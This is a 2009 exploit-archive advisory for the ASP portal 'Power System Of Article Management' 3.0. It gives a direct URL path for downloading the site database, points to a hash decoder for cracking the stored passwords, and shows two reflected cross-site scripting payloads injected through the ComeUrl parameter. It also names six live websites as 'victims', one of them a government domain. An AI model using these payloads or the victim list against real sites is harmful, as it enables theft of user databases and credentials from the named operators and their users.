[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Power System Of Article Management (DD/XSS) Vulnerabilities
# Published : 2009-02-04
# Author : Pouya_Server
# Previous Title : PHPbbBook 1.3 (bbcode.php l) Local File Inclusion Exploit
# Next Title : Team 1.x (DD/XSS) Multiple Remote Vulnerabilities


#########################################################
---------------------------------------------------------
Portal Name: Power System Of Article Management
Version : 3.0
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : (DD/XSS)
---------------------------------------------------------
#########################################################
[DD]:
http://site.com/[Path]/database/yiuwekdsodksldfslwifds.mdb
Hash Decoder :
http://pouya2006.persiangig.com/dec/PSOAMv3.html
or Google searching ...
 
[XSS]:
http://site.com/[Path]/userchklogin.asp?UserName=Pouya&Password=Pouya&CookieDate=0&ComeUrl=>"><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&Submit=%C8%B7%C8%CF

http://site.com/[Path]/userlogin.asp?ComeUrl=>"><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>
---------------------------------
Victem :
http://www.honeyjenny.com/art
http://www.hzyzzz.com
http://cdzy.cn/wyx/article
http://unix-cd.com/article
http://zhuyaren.com
http://www.ahss.gov.cn
---------------------------------------------------------
#########################################################

# www.Syue.com [2009-02-04]